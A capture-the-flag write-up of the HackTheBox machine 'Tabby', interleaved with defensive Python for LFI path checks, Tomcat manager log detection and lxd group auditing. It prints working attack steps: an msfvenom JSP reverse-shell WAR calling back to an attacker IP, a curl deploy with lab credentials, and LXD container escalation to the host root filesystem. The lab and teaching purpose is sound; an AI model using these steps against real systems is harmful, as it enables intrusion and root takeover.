Hackthebox — Tabby

Summary

Today we have another retired Linux machine, with IP 10.10.10.194

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.194
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-23 21:01 EET
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
root@strike:~#

We have 3 open ports: 22 (SSH), 80 (HTTP, Apache) and 8080 (HTTP, Apache Tomcat)

Web enum

So I took a look at the new service link

When I saw the file parameter, I thought about LFI,
so I tried to read /etc/passwd

I got the username ash
Next I decided to enumerate port 8080
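The LFI finding above is worth pairing with the fix. The Python below is an added example, not code from this write-up or from the target site (the page does not show which server-side language the vulnerable page uses), and it assumes a hypothetical download endpoint that serves files from one fixed directory. It puts the unsafe join that makes /etc/passwd reachable beside a resolver that anchors every request inside the base directory.

```python
import os
from pathlib import Path

# Hypothetical directory the download endpoint is meant to serve from
# (constructed for this example; not a path taken from the write-up).
BASE_DIR = "/var/www/html/files"


def unsafe_resolve(user_supplied, base_dir=BASE_DIR):
    """The vulnerable pattern: join the user value and trust the result.

    os.path.join discards base_dir when user_supplied is absolute, and
    '..' segments walk out of it, so 'file=/etc/passwd' or
    'file=../../../../etc/passwd' both reach arbitrary files.
    """
    return os.path.normpath(os.path.join(base_dir, user_supplied))


def safe_resolve(user_supplied, base_dir=BASE_DIR):
    """Return the absolute path for user_supplied inside base_dir, or None.

    Resolution happens first (symlinks, '..', absolute paths), then the
    containment check is done on the resolved result, so nothing that
    later normalisation would undo can slip past the check.
    """
    if "\x00" in user_supplied:  # NUL can truncate paths in C code below us
        return None
    base = Path(base_dir).resolve()
    candidate = (base / user_supplied).resolve()
    # Require a strict descendant: the directory itself is not a servable file
    if base in candidate.parents:
        return str(candidate)
    return None


def is_allowed(user_supplied, base_dir=BASE_DIR):
    """True when the request stays inside base_dir."""
    return safe_resolve(user_supplied, base_dir) is not None


if __name__ == "__main__":
    for req in ("statement.pdf", "../../../../etc/passwd", "/etc/passwd"):
        print(f"{req!r:32} unsafe -> {unsafe_resolve(req)}  allowed: {is_allowed(req)}")
```

The same check applies whatever the language of the real endpoint: resolve first, then compare against the base directory, and reject anything that is not strictly below it. A denylist of `..` or `/etc/` strings is not a substitute, since encodings and symlinks get around it.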

Trying to enumerate users:
view-source:LINK

Backdoor WAR

root@strike:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.22 LPORT=4242 -f WAR > fix.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@strike:~#

Now we need to upload the fix.war file, so I used curl with the credentials I found: tomcat:$3cureP4s5w0rd123!

root@strike:~# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file fix.war "http://megahosting.htb:8080/manager/text/deploy?path=/fix.war"
OK - Deployed application at context path [/fix.war]
root@strike:~#

Launch listener

Browser

Got connection
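The deploy above leaves a clear trace in the Tomcat access log. The Python below is an added example, not code from this write-up or from the Tomcat project, that scans a few constructed access-log lines in the default AccessLogValve format (`%h %l %u %t "%r" %s %b`) for manager activity: a successful deploy or undeploy is rated critical, 401/403 responses against the manager are counted per client as possible credential guessing. The sample lines are constructed to mirror the session in the write-up.

```python
import re

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample lines modelled on the session in the write-up
SAMPLE_LOG = """
10.10.14.22 - - [23/Jun/2020:21:29:58 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.22 - - [23/Jun/2020:21:30:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.22 - tomcat [23/Jun/2020:21:30:12 +0000] "PUT /manager/text/deploy?path=/fix.war HTTP/1.1" 200 49
10.10.14.22 - tomcat [23/Jun/2020:21:30:40 +0000] "GET /fix.war/ HTTP/1.1" 200 0
192.0.2.10 - - [23/Jun/2020:21:31:05 +0000] "GET /index.jsp HTTP/1.1" 200 1234
""".strip().splitlines()


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Severity for a parsed entry, or None when it does not touch the manager app."""
    path = entry["path"].split("?", 1)[0]
    if not path.startswith("/manager/"):
        return None
    succeeded = entry["status"].startswith("2")
    changes_apps = entry["method"] == "PUT" or path.endswith(("/deploy", "/undeploy"))
    if succeeded and changes_apps:
        return "critical"  # an application was (un)deployed: new code runs as the Tomcat user
    if entry["status"] in ("401", "403"):
        return "warning"   # rejected manager access: watch for guessing
    return "info"          # any other manager traffic is worth recording


def scan(lines):
    """Return (severity, ip, user, method, path, status) for every manager request."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity is not None:
            alerts.append((severity, entry["ip"], entry["user"], entry["method"],
                           entry["path"], entry["status"]))
    return alerts


def failed_manager_auth_by_ip(lines):
    """Count 401/403 manager responses per client, for a thresholded alert."""
    counts = {}
    for severity, ip, *_ in scan(lines):
        if severity == "warning":
            counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(*alert)
    print(failed_manager_auth_by_ip(SAMPLE_LOG))
```

Two notes on the data: the `%u` field only carries a username once authentication succeeded, so the deploy line is also the first one that names the `tomcat` account, and the request to `/fix.war/` is ordinary application traffic as far as the log format shows, which is why correlating the deploy with the first hit on the new context path is what ties the two together. On the prevention side, the manager application ships with a `RemoteAddrValve` entry in its `context.xml` that restricts which client addresses may reach it; leaving the manager open to the network with a guessable password is the condition the whole step above depends on.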

After searching, I found an interesting zip file

I downloaded and extracted it. After cracking it I found this password: admin@it
So let’s connect as the ash user with that password

Got the user flag!

Privilege Escalation

Ref: LXD Privilege Escalation
After downloading the LXD builder, running the build and getting the Alpine image, I launched a Python simple HTTP server to upload the file to the machine

After uploading the file, import it:

ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
ash@tabby:~/temp$ lxc init bom fox -c security.privileged=true
Creating fox
ash@tabby:~/temp$ lxc config device add fox mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to fox
ash@tabby:~/temp$ lxc start fox
ash@tabby:~/temp$ lxc exec fox /bin/sh
~ # ls

Search for root.txt file

Got the root flag!
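The container steps above only work for a user who is a member of the lxd group: that membership is what lets an unprivileged account start a privileged container with the host filesystem mounted inside it, so the fix is to treat lxd group membership as root access and hand it out accordingly. The Python below is an added example, not code from this write-up or from the referenced article, that audits a constructed /etc/group for membership in groups that are effectively root-equivalent on a typical Linux host; run as a script it reads the real /etc/group instead.

```python
import sys

# Constructed /etc/group content, shaped like a host where a normal user
# has been added to the lxd group (not the real file from the machine).
SAMPLE_GROUP_FILE = """
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
docker:x:998:
ash:x:1000:
"""

# Groups whose membership is effectively root-equivalent on a typical host,
# with the reason each one matters.
HIGH_RISK_GROUPS = {
    "lxd": "can start a privileged container that mounts the host root filesystem",
    "docker": "can run containers as root with arbitrary host mounts",
    "disk": "raw read/write access to block devices, including the root disk",
    "sudo": "may run commands as root depending on sudoers",
}


def parse_group_file(text):
    """Map group name -> list of supplementary members from /etc/group content."""
    groups = {}
    for line in text.strip().splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 4:      # malformed line: skip rather than guess
            continue
        name, _password, _gid, members = parts
        groups[name] = [m for m in members.split(",") if m]
    return groups


def risky_memberships(text, ignore=("root",)):
    """Return (user, group, reason) for every non-ignored member of a high-risk group."""
    findings = []
    for group, members in parse_group_file(text).items():
        if group not in HIGH_RISK_GROUPS:
            continue
        for user in members:
            if user not in ignore:
                findings.append((user, group, HIGH_RISK_GROUPS[group]))
    return sorted(findings)


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/group"
    with open(path, encoding="utf-8") as fh:
        content = fh.read()
    for user, group, reason in risky_memberships(content):
        print(f"{user} is in {group}: {reason}")
```

On a host like this one the finding would be `ash is in lxd`, and the remediation is to remove that membership (`gpasswd -d ash lxd`, or managing the group through whatever configuration tool owns the host) and to check that no other service account has been given it for convenience. The same audit belongs in a periodic job, since the membership that made this escalation possible is a one-line change that is easy to add and easy to forget.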

If you learned anything useful from this write-up, respect me on HackTheBox

Thanks for your time!

Ahmed Samir

CTFer | Computer Science Student